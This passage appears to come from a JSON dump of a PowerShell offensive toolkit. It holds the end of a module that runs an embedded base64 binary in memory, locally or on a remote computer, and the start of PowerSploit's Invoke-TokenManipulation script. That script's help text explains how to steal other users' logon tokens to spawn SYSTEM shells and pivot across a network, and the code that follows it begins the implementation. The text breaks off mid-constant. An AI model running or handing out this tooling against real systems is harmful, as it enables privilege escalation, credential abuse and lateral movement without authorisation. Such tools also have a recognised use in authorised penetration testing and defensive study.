ec9DD4bPig+hz6UPqQ+rD6yPtY+Jj8uPzw/mT+oP7A/AAAAUAAA2AAAACIw6jAIMRcxHzFAMa4xuDHPMQcyHjIyMmYy9zIFMxkzITMvMzQzYTNpM4MzjjOjM8Uz9DMfNC00QjRbNG40hDShNNQ0+jQTNSw1TzWENZk1rjXINdo1CjYeNj42YDaANqs27Db2Ng03GTdXN203ije3N+83/DcYOCs4VDhqOIA4jDiiOMw41zjnOFM5dDmBOYc5lTmcObk5zTncOew59Dn6OQc6DjokOoc6rjr9OlM72TzoPBA9ND1lPYQ9kT0JPlc+aT57PpU+4D6nP90/9j8AYAAA1AAAAAYwFDAtMDcwsjDWMOcwZjHpMRIyYzJ5MqkysTK3MsUyzjLWMgMzEDMZMx8zSDNaM4Uz7jMWNEc00zTeNP80GzVGNRY22jbpNiE4jTjGOBA5UzmPOR48XTx6PLQ8yTz2PAc9GD0vPT49Xz1yPZo9pD3FPco96T3+PRo+Lz5GPqc+rj6zPrk+vz7FPss+0T7XPt0+4z7pPu8+9T4aPyA/Jj8sPzI/OD9PP1U/Wz9hP2c/bz9zP3c/ez9/P4M/hz+LP48/kz+XP5s/9T8AAABwAAAcAQAAOzCZMM0w3TCfMbAy0jJ4NJA3dTj5OFQ5WTlnOXY5ezmDOZE5njmpObA5vTnFOcs50DnXOd054jnpOe859Dn7OQE6BjoNOhM6GDofOiU6KjoxOjc6PDpDOkk6TjpVOls6YzprOnM6ezqDOos6kzqnOq46wjrIOs461DraOuA65jrsOvI69zoIOxw7LTtMO287fjucO607ujvBO9U77jsFPA88Kzw0PFI8XzxsPHc8fTybPLw8zDzYPPA8+zwVPTE9SD1aPWE9bj10PZE9qT2wPcQ93T3wPQg+Hj4pPjA+UT5oPoY+nj6mPqw+wj7KPuU+7D75Pv8+Bz8NPxs/JT9QP1Y/Zj9wP4g/kT+XP7Y/0z/fP/A/AIAAAKABAAAFMEcwUDBwMKowtzDgMPIw/jADMQwxLjE4MUYxdjGDMa4x1zEHMiQyWjJiMmgyeDKRMqIyszK8MsIyzTLhMvgyFjNLM1MzYzN5M44zozOsM7Qz4zPsMwM0EjQjNCk0NjR1NHs0iTSSNJs00jTcNOE0CzUzNWA1ezWGNZ41wDXPNdk1CzYQNho2IDY2Nj42RDZMNlI2dzZ8Nrs2xDbKNts24zbpNvc2/zYFNxo3TjdYN2A3eTeuN7c3wjfHN9E31zfrN/M3+TcJOBE4FzgjOJ44uDjOOPI4+zgpOT85RTlLOVE5Yjl6OYs5uDnyOQw6ZTpyOng6gDqGOqI6sDq9OsM6zDrTOtk64DrvOv86BTsMOxI7GTswOzk7TDtfO2w7eDuQO5k7pjusO8s70Tv4OyM8Kzw8PFw8rzy6PMM82DzgPOs8+zwNPT09TT1jPW49eT2PPZw9oj2qPbA9uD2+Pcw91D3aPeQ98T3+PQc+FD4iPiw+Rj5MPms+wz7YPvM+Dz8sPz4/Tz9hP20/dz+NP6I/rD+2P9U/9j8AkAAA6AAAAA0wJzBFMEswXTB6MIcwmzDuMA0xFDE1MUwxajGUMaYxuDHpMQgyVDJ5MpIymDLXMiIzKjMwM5MznjOkM9QzFzRHNE00qjRKNVI1WDVyNX01gzW2Ne01KDYuNmI2eTajNs02Mzd7N5w3tjf6Nw84MzhQOHU4gjiROJg4sTi8OMw4BzkOOSU5XjmfOfE5OzpFOlk6ezqyOtM67DoTO147azuWO6g7tTvOO9Q7GTwjPCk8dTx/PO489TwAPS09VD1zPcA94z05PkU+Uj5ZPmQ+oj7PPho/LD8zP3k/0z/1PwAAAKAAAOQAAAALMCswQjBdMOUw+TAUMSQxgTGQMbIx7TE4MnsyhzKOMtAyDjMcMzgzdjOEM6YzwjM2NH00mzSxNNw07jT1NC01lTWcNbM11TXwNQc2GjYhNjU2VDZsNrc20zbZNuE25zb3Nv82BTcXNy83ODdPN7A34zfzNws4RzhlOIo4mTj8OBM6GjonOlE6WzpkOnA6qDrKOtY6jTuWO507sDvMO+I7EzwkPEM8aTx4PIg8kjyqPLQ81z3rPfE9Oz5bPns+mz67Pts++z4VPy8/ST9jP3Q/ez+VP6I/vj/DPwAAALAAAPAAAAA+ME0wcTB3MIQwjzCVMKcwsDDfMOQwDTGWMa4xvjHbMTEyOzJGMqYy2jIvM0YzfzOdM7cz1zPfM+Uz7TPzMxU0WDR7NJs0sTTLNN40RjVNNWI1aTVvNa41yDXWNek1+zUNNjA2PjZRNnc2jDauNr023Db4Nhk3PzdZN4w3tTfPN6U8qzyyPME8xjzOPNQ82TzgPOY86zzyPPg8/TwEPQo9Dz0WPRw9IT0pPS49OT1BPUk9UT1dPWM9ej2APYY9kT2ZPaY9rD2zPbk9xj3LPdA95j3rPfA9Bj4LPhA+Iz4qPlQ+Wj/BPwAAAMAAANwAAABHMFwwZjB5MI0wlzC0MOAw9jAZMS4xNjE8MVMxUTJhMmcydTKRMqsyxTLdMhczHDNAM0YzZjOmM6wzuDPIM+Mz/jMPNTM1RzVbNW81vjXlNQw2KDZyNrc2FDcZNzk3cTd+N4Q3jDeSN5o3oDeoN643vzfHN8035zfvN/U3/TcDOEA6YTqDOqA6vTrIOjE7UDt4O4c73TsWPEw8WDxfPGc8bTyAPI88rjzWPPs8GD1hPW89pD2rPbg9vj3YPeA95j01PnY+rj7ZPgE/Vz+BP84/+j8AAADQAABwAQAAGTA2MIMwrzDOMOswJzFTMXIxjzGmMa4x7TEEMisyWTKEMpUyqTLPMvcy/zIFM3kzhzOTM54zvzPRMws0GDQnNC80NTRCNGA0czSJNK00zzTfNOs08TQnNS01OzVPNV01fjWPNZk1tTXRNe01CTY1Nko2VDZ1NpI2mjagNrQ2yzbSNuw28TYLNxA3KjcvN0k3TjdoN203hzeMN6Y3qzdfOIo4sjj1OAM5QTlJOU85XTljOW85ejl/OYY5iznIOf45BToSOhg6Jjo2Oj06VjpeOmQ6eTqUOqs6xzrROts66ToJOxs7KTsuO0c7ZztzO3o7gTuUO5w7oTutO7o7xDvQO+o78Tv+OwU8DDwSPBg8HTw+PEQ8UzxhPHc8jzynPL08xzzaPO88AT0IPQ49FD0wPTw9UD1XPXk9iD3YPfo9Ez4jPkw+Uj5hPok+qD7VPt4+Kz82P0s/UT9fP2U/bD93P6c/xT/aP+A/AOAAAIABAAAGMBYwRDBPMGswdjCOMJMwnzDBMOEwGjEgMX0xjTGlMbExxjHmMe8xDDInMj8yRDJLMlwyYjJpMngyfTKFMosykDKXMp0yojKpMq8ytDK7MsEyxjLNMtMy2DLfMuUy6jLxMvcy/DIDMwgzDzMXMx8zJzMvMzczPzNHM1UzXjNpM4AzlzO2M7sz7DMTNCQ0RzRoNHU0jzSuNLg01TTwNBY1WTVeNX41qDW1Nc817jX4NRU2MDZLNnE2tza8NuQ2ADc1Nzo3RTdpN4Q3rDe3N9g34DcaOEM4TjhuOIk4lji6ON046Tj+OCA5MDk7OU85XzlnOW05hDmtOdA56TktOks6aTqBOo46rDq8OsE60jruOvw6BjsUOy47OztIO207ojuuO747xjvsO/07AzwTPDc8aDxyPH48tTzCPN484zwLPSk9Sz15PYg9qT2vPbw9xT3LPeU96z3zPfk9Fz5BPk0+Wz5pPnU+gT6OPsk+6z4HPxg/SD90P5c/APAAALgBAACsMPcwBjFMMWMxszHNMeAxEzIhMigyLzI2Mj0yRDJUMlsyYjJ7MoMyiTKWMvkyvDPfM+8z9zMPNB40JTRHNGc0bjR0NHk0ijS8NMQ0yTTPNN405DQUNRw1IjU9NV81ZTVrNXA1hjWYNak1sTW/NcQ1zzXWNeM18DX8NVQ2mDbENuo2azd3N4I3iDeNN5w3oTepN683tDe7N8E3xjfNN9M32DffN+U36jfxN/c3/DcDOAk4DjgVOBs4IDgnOC44Njg+OEY4TjhWOF44ZjhuOHo4fziHOJA4njikOLM4uDi+ONE41jjdOOM4+zgAOQc5DTkZOSE5KDktOTI5ODlGOU05UzlmOW05czl/OYc5jDmZOaY5qzm2Ob05wznKOdc53DnnOe05JDozOj46TDpVOq46QzteO347BTzgPPM8/TwNPRM9GT0fPUM9ST1RPWw9fz2RPao9sD21PcY9zT3RPdk93T3lPe89ED4bPjI+Pz5YPl4+bD6IPpM+tD7UPu4+9z4APwY/HT9EP1U/Yz9oP20/cj93P3w/ij+QP5w/pz+wP7k/wj/JP9o/4z/1P/s/AAAAAAEADAEAAAAwBzAQMCUwOTBFMEwwUzBbMGEwdTCDMIkwkDC4MMEwzTDaMEMxTDFUMWAxbjF8MYoxkTGdMa8xvTHGMfYx+zEgMtAy3zLuMoIzjzOnM9Yz4jP9Mxw0TzR8NJM0nTS4NMg03DQBNR81JjUtNT41VDV/NZ01pDWrNbw11zUGNiQ2KzZINlg2iDakNqo2yjbmNvM2AzcNNxs3KzdBN0c3XDdiN5w3ojevN7Y3IDhIOMI49zgJOSg5RzlhOZE5xDnWOfU5GDpIOmk6eDqIOqY6yTrtOhI7GTskO0g7djugO7474zvqOzE8QTxRPGg8bzy5PMU8zDzTPNs89T1qPgw/SD/nPwAAABABADwBAAARMNsw4zD+MAQxKDE3MUwxYTF1MZAxsTHBMRQyGzI+MkUyWTJpMs8y6jIHM0MzYzNoM3wzhzOgM78z6TPwMw00FDRgNGk0cjT+NAw1EjUkNTA1cDV5NbY1wDXGNdA15TXuNRs2JDYqNl82gTaKNqM2rTbpNvo2FzdDN0s3XDdlNzg4QThMOFs4jTi+OMc40jjmOP04ajmeOaY5rDnTOd856zkUOhw6IjozOj06ZDq5OsA6xjrNOtI64zrzOgU7EDslOz07RjtOO1s7ZDudO9s75DvvOy48NzxXPL48xjzMPNo84TwIPSk9OD1ePYE9rD3DPdI92z3tPfY9CD4RPiY+Lz5APkk+Zz5zPoU+jj6sPrg+yj7TPvA+/D4VPx4/KT8yP04/Vz9iP2s/dj9/P4o/kz8AAAAgAQAUAQAACzCAMKUw5zDwMPcw/DANMRwxqTHCMeUx9DEmMmgyUzN+M4YzjDOZM90zKzTDNOQ0AjVINVE1WDVdNW41fjXjNQs2HTZiNms2cjZ3Nog2lzYSN1A3VzddN2Q3aTd6N4c3kDe3N9s38zcCOAg4DjgUOBo4IDgmOCw4Mjg4OD44RDhKOFA4VjhcOGI4aDhuOHQ4ejiAOIY4jDiSOJg4njikOKo4sDi2OLw4wjjIOM441DjaOOA45jjsOPI4+Dj+OAQ5CjkQORY5HDkiOSg5Ljk0OTo5QDlGOUw5UjliOeA57DkKOhA6NTp3OrY6+zoyO3k8hTyRPag+sD7IPo0/kz+YP7k/wT/HP80/8z/8PwAwAQCoAAAADTAlMDowPzBFMF0wYjBuMH4whDCLMKIwqDC1MMUw2jDkMP8wBTEMMRcxITEyMUsxVTFxMX4xpjIjMy0zgjOtM7MzuTO/M8UzyzPSM9kz4DPnM+4z9TP8MwQ0DDQUNCA0KTQuNDQ0PjRHNFI0YDRlNGs0djR9NCg1LjUCNic2aTanNtg2Fjc7N103jTfENx04iTihOMU4wDr7OxQ98j0AAABAAQBYAAAAXzAMMjsyUzKMMpAylDKYMpwyoDKkMqgy0DKRMwo0MzSMNPw0FDU4NUQ4czjeOPs4njl5Otg87j0JPqA++z7/PgM/Bz8LPw8/Ez8XP0A/AAAAUAEAQAAAADAwbDB5MKswADEZMSAyMDI+Mr4yCDMVM/0zPDSRNLc0AjW9NdQ4YzlpOXo5HDq+O5I8pjzIPKM/AGABAGwAAAAfMDAxbjHZMh4zUDOJM+Mz7DOXNKU0AjUINQ41GTU2NYM1iDWfNcI1zzXbNeM16zX3NQk2FjYeNoM21jbkNhQ3LjcBOPc4/ziyOZQ6LTszO9U72zvrO4s8ojxFPTs+Qz72Ptg/AHABAHAAAABxMHcwGTEfMS8xzzHmMRYy5DNLNNk28DY7Oj86QzpHOks6TzpTOlc6WzpfOmM6Zzp0OuY64TvyOw48TTxkPG88vjzZPO48AT0mPWI9fj2ZPdg9ID4uPmY+nT64Ptc+6j73PqQ/uz8AAACAAQAYAAAADjAcMFUwbzDOMNQw2jDgMACQAQCIAgAA6DMoNCw0cDV0NXg1gDWINYw1kDWUNcg3zDfQN9Q33DfgN+Q3MDg0ODg4PDhAOEQ4SDhMOFA4VDhYOFw4YDhkOGg4bDhwOHQ4eDh8OIA4hDiIOIw4kDiUOJg4nDigOKQ4qDisOLA4tDi4OLw4wDjEOMg4zDjQONQ42DjcOOA45DjoOOw48Dj0OPQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjg6VDpYOlw6YDpkOmg6bDpwOnw6gDqEOpg6sDrIOuA65Dr4Ovw6EDsUOxg7HDsgOyQ7KDssOzA7NDs4Ozw7QDtEO1A7XDtgO2Q7aDtsO3A7dDt4O3w7gDuEO4g7jDuQO5w7qDusO7A7tDu4O7w7wDvEO8g7zDvQO9Q72DvcO+A75DvoO+w78Dv0O/g7/DsAPAQ8CDwMPBA8FDwYPBw8IDwkPCg8MDw8PEA8TDxYPFw8YDxkPGg8bDxwPHQ8eDx8PIA8hDyIPIw8kDyUPJg8nDygPKQ8qDysPLA8tDy4PLw8wDzEPMg8zDzQPNQ82DzcPOA85DzoPOw88Dz0PPg8/DwAPQQ9CD0MPRA9HD0oPSw9MD00PTg9RD1QPVQ9WD1cPWA9ZD1oPWw9cD10PXg9hD2QPZQ9mD2cPaA9pD2oPaw9sD20Pbg9vD3APcQ9yD3MPdA92D3cPeQ96D3wPfQ9AD4EPgg+DD4QPhQ+GD4cPiA+JD4oPiw+MD40Pjg+PD5APkw+4D7oPuw+8D74Pvw+CD8MPxg/HD8oPyw/MD84Pzw/QD9IP0w/UD9YP1w/aD9sP3g/fD+IP4w/mD+cP6g/rD+4P7w/yD/MP9A/2D/cP+A/6D/sP/g//D8AAACgAQAQAQAACDAMMBAwFDAYMBwwIDAkMCgwLDA4MEgwTDBQMFQwWDBcMGAwZDBoMGwwcDB0MHgwfDCAMIQwiDCMMJAwlDCgMKQwqDCwMLgwwDDIMNAw2DDgMOgw8DD0MPgw/DAAMQQxCDEMMRAxFDEYMRwxIDEkMSgxLDEwMTQxODE8MUAxRDFIMUwxUDFYMWAxaDFwMXgxgDGIMZAxmDGgMagxsDG4McAxyDHQMdgx+DH8MQAyBDIIMgwyEDIUMhgyHDIgMiQyKDIsMjAyNDI8MkAyRDJIMkwyUDJUMlgyXDJgMmQyaDJsMnAydDJ4MnwygDKEMogyjDKQMpQymDKcMqAypDKoMrAytDK4MgAAAJACADAAAACQOpg6nDqkOqg6sDq0Orw6wDrIOsw61DrYOuA65DrsOvA6DDsQOwAAAMACANQAAAAQMBQwMDAwMzQzPDOIM8QzADQ8NHg0rDSwNLg08DQsNWg1nDWgNag12DUMNhA2GDY4Njw2RDZ0Nqg2rDa0NgA3PDd4N7Q38DcsOGg4nDigOKQ4qDi0OPA4LDloOZw5qDnIOcw51DkgOlw6mDrUOhA7TDuAO4Q7iDuMO5A7lDuYO5w7oDukO6g7rDuwO7Q7yDsEPEA8fDywPLQ8ED0YPUw9VD2IPZA9xD3MPVA+WD6MPpQ+yD7QPgQ/DD84Pzw/QD9EP0g/TD9QP4g/xD8A0AIAzAAAAAAwSDBQMHwwgDCEMIgwjDCQMJQwmDDgMBwxWDGUMcgx9DH4MfwxADIEMggyIDIoMlwyZDKYMqAy1DLcMggzDDMQMxQzGDMcMyAzJDMoM5AzmDPMM9QzCDQQNEQ0TDSANIg0vDTENCg1MDVkNWw1oDWoNeA1HDZYNrA2uDbsNvQ2KDcwN2A3jDeQN5Q3mDecN6A3pDeoN6w3sDe0N7g3vDfAN8Q3yDfMN9A31DfYN9w34DfkN+g37DfwN/Q3+Df8NwA4BDgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\"\n\n\tif ($ComputerName -eq $null -or $ComputerName -imatch \"^\\s*$\")\n\t{\n\t\tInvoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)\n\t}\n\telse\n\t{\n\t\tInvoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs) -ComputerName $ComputerName\n\t}\n}\n\nMain\n}\n"
  },
  {
    "path": "modules/Invoke-TokenManipulation.ps1",
    "content": "function Invoke-TokenManipulation\n{\n<#\n.SYNOPSIS\n\nThis script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use\nanothers users credentials over the network by creating a process with their logon token. This will work even with Windows 8.1 LSASS protections.\nThis functionality is very similar to the incognito tool (with some differences, and different use goals).\n\nThis script can also make the PowerShell thread impersonate another users Logon Token. Unfortunately this doesn't work well, because PowerShell\ncreates new threads to do things, and those threads will use the Primary token of the PowerShell process (your original token) and not the token\nthat one thread is impersonating. Because of this, you cannot use thread impersonation to impersonate a user and then use PowerShell remoting to connect\nto another server as that user (it will authenticate using the primary token of the process, which is your original logon token).\n\nBecause of this limitation, the recommended way to use this script is to use CreateProcess to create a new PowerShell process with another users Logon \nToken, and then use this process to pivot. This works because the entire process is created using the other users Logon Token, so it will use their\ncredentials for the authentication.\n\nIMPORTANT: If you are creating a process, by default this script will modify the ACL of the current users desktop to allow full control to \"Everyone\". \nThis is done so that the UI of the process is shown. If you do not need the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL\nis not permenant, as in, when the current logs off the ACL is cleared. It is still preferrable to not modify things unless they need to be modified though,\nso I created the NoUI flag. ALSO: When creating a process, the script will request SeSecurityPrivilege so it can enumerate and modify the ACL of the desktop.\nThis could show up in logs depending on the level of monitoring.\n\n\nPERMISSIONS REQUIRED:\nSeSecurityPrivilege: Needed if launching a process with a UI that needs to be rendered. Using the -NoUI flag blocks this.\nSeAssignPrimaryTokenPrivilege : Needed if launching a process while the script is running in Session 0.\n\n\nImportant differences from incognito:\nFirst of all, you should probably read the incognito white paper to understand what incognito does. If you use incognito, you'll notice it differentiates\nbetween \"Impersonation\" and \"Delegation\" tokens. This is because incognito can be used in situations where you get remote code execution against a service\nwhich has threads impersonating multiple users. Incognito can enumerate all tokens available to the service process, and impersonate them (which might allow\nyou to elevate privileges). This script must be run as administrator, and because you are already an administrator, the primary use of this script is for pivoting\nwithout dumping credentials. \n\nIn this situation, Impersonation vs Delegation does not matter because an administrator can turn any token in to a primary token (delegation rights). What does\nmatter is the logon type used to create the logon token. If a user connects using Network Logon (aka type 3 logon), the computer will not have any credentials for \nthe user. Since the computer has no credentials associated with the token, it will not be possible to authenticate off-box with the token. All other logon types\nshould have credentials associated with them (such as Interactive logon, Service logon, Remote interactive logon, etc). Therefore, this script looks\nfor tokens which were created with desirable logon tokens (and only displays them by default).\n\nIn a nutshell, instead of worrying about \"delegation vs impersonation\" tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon (good).\n\n\nPowerSploit Function: Invoke-TokenManipulation\nAuthor: Joe Bialek, Twitter: @JosephBialek\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n.DESCRIPTION\n\nLists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.\n\n.PARAMETER Enumerate\n\nSwitch. Specifics to enumerate logon tokens available. By default this will only list unqiue usable tokens (not network-logon tokens).\n\n.PARAMETER RevToSelf\n\nSwitch. Stops impersonating an alternate users Token.\n\n.PARAMETER ShowAll\n\nSwitch. Enumerate all Logon Tokens (including non-unique tokens and NetworkLogon tokens).\n\n.PARAMETER ImpersonateUser\n\nSwitch. Will impersonate an alternate users logon token in the PowerShell thread. Can specify the token to use by Username, ProcessId, or ThreadId.\n    This mode is not recommended because PowerShell is heavily threaded and many actions won't be done in the current thread. Use CreateProcess instead.\n\t\n.PARAMETER CreateProcess\n\nSpecify a process to create with an alternate users logon token. Can specify the token to use by Username, ProcessId, or ThreadId.\n\t\n.PARAMETER WhoAmI\n\nSwitch. Displays the credentials the PowerShell thread is running under.\n\n.PARAMETER Username\n\nSpecify the Token to use by username. This will choose a non-NetworkLogon token belonging to the user.\n\n.PARAMETER ProcessId\n\nSpecify the Token to use by ProcessId. This will use the primary token of the process specified.\n\n.PARAMETER Process\n\nSpecify the token to use by process object (will use the processId under the covers). This will impersonate the primary token of the process.\n\n.PARAMETER ThreadId\n\nSpecify the Token to use by ThreadId. This will use the token of the thread specified.\n\n.PARAMETER ProcessArgs\n\nSpecify the arguments to start the specified process with when using the -CreateProcess mode.\n\n.PARAMETER NoUI\n\nIf you are creating a process which doesn't need a UI to be rendered, use this flag. This will prevent the script from modifying the Desktop ACL's of the \ncurrent user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control\nto \"Everyone\".\n\n.PARAMETER PassThru\n\nIf you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline.\n\n\t\n.EXAMPLE\n\nInvoke-TokenManipulation -Enumerate\n\nLists all unique usable tokens on the computer.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"\n\nSpawns cmd.exe as SYSTEM.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -ImpersonateUser -Username \"nt authority\\system\"\n\nMakes the current PowerShell thread impersonate SYSTEM.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -ProcessId 500\n\nSpawns cmd.exe using the primary token belonging to process ID 500.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -ShowAll\n\nLists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon.\n\n.EXAMPLE\n\nInvoke-TokenManipulation -CreateProcess \"cmd.exe\" -ThreadId 500\n\nSpawns cmd.exe using the token belonging to thread ID 500.\n\n.EXAMPLE\n\nGet-Process wininit | Invoke-TokenManipulation -CreateProcess \"cmd.exe\"\n\nSpawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the \"-Process\" parameter of the script.\n\n.EXAMPLE\n\n(Get-Process wininit | Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -PassThru).WaitForExit()\n\nSpawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited.\n\n.EXAMPLE\n\nGet-Process wininit | Invoke-TokenManipulation -ImpersonateUser\n\nMakes the current thread impersonate the lsass security token.\n\n.NOTES\nThis script was inspired by incognito. \n\nSeveral of the functions used in this script were written by Matt Graeber(Twitter: @mattifestation, Blog: http://www.exploit-monday.com/).\nBIG THANKS to Matt Graeber for helping debug.\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\nBlog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/\n\n#>\n\n    [CmdletBinding(DefaultParameterSetName=\"Enumerate\")]\n    Param(\n        [Parameter(ParameterSetName = \"Enumerate\")]\n        [Switch]\n        $Enumerate,\n\n        [Parameter(ParameterSetName = \"RevToSelf\")]\n        [Switch]\n        $RevToSelf,\n\n        [Parameter(ParameterSetName = \"ShowAll\")]\n        [Switch]\n        $ShowAll,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Switch]\n        $ImpersonateUser,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $CreateProcess,\n\n        [Parameter(ParameterSetName = \"WhoAmI\")]\n        [Switch]\n        $WhoAmI,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $Username,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Int]\n        $ProcessId,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\", ValueFromPipeline=$true)]\n        [Parameter(ParameterSetName = \"CreateProcess\", ValueFromPipeline=$true)]\n        [System.Diagnostics.Process]\n        $Process,\n\n        [Parameter(ParameterSetName = \"ImpersonateUser\")]\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        $ThreadId,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [String]\n        $ProcessArgs,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Switch]\n        $NoUI,\n\n        [Parameter(ParameterSetName = \"CreateProcess\")]\n        [Switch]\n        $PassThru\n    )\n   \n    Set-StrictMode -Version 2\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-DelegateType\n\t{\n\t    Param\n\t    (\n\t        [OutputType([Type])]\n\t        \n\t        [Parameter( Position = 0)]\n\t        [Type[]]\n\t        $Parameters = (New-Object Type[](0)),\n\t        \n\t        [Parameter( Position = 1 )]\n\t        [Type]\n\t        $ReturnType = [Void]\n\t    )\n\n\t    $Domain = [AppDomain]::CurrentDomain\n\t    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t    $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t    Write-Output $TypeBuilder.CreateType()\n\t}\n\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-ProcAddress\n\t{\n\t    Param\n\t    (\n\t        [OutputType([IntPtr])]\n\t    \n\t        [Parameter( Position = 0, Mandatory = $True )]\n\t        [String]\n\t        $Module,\n\t        \n\t        [Parameter( Position = 1, Mandatory = $True )]\n\t        [String]\n\t        $Procedure\n\t    )\n\n\t    # Get a reference to System.dll in the GAC\n\t    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t    # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t    # Get a handle to the module specified\n\t    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t    $tmpPtr = New-Object IntPtr\n\t    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t    # Return the address of the function\n\t    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t}\n\n    ###############################\n    #Win32Constants\n    ###############################\n    $Constants = @{\n        ACCESS_SYSTEM_SECURITY = 0x01000000\n        READ_CONTROL = 0x00020000\n        SYNCHRONIZE = 0x00100000\n        STANDARD_RIGHTS_ALL = 0x001F0000\n        TOKEN_QUERY = 8\n        TOKEN_ADJUST_PRIVILEGES = 0x20\n        ERROR_NO_TOKEN = 0x3f0\n        SECURITY_DELEGATION = 3\n        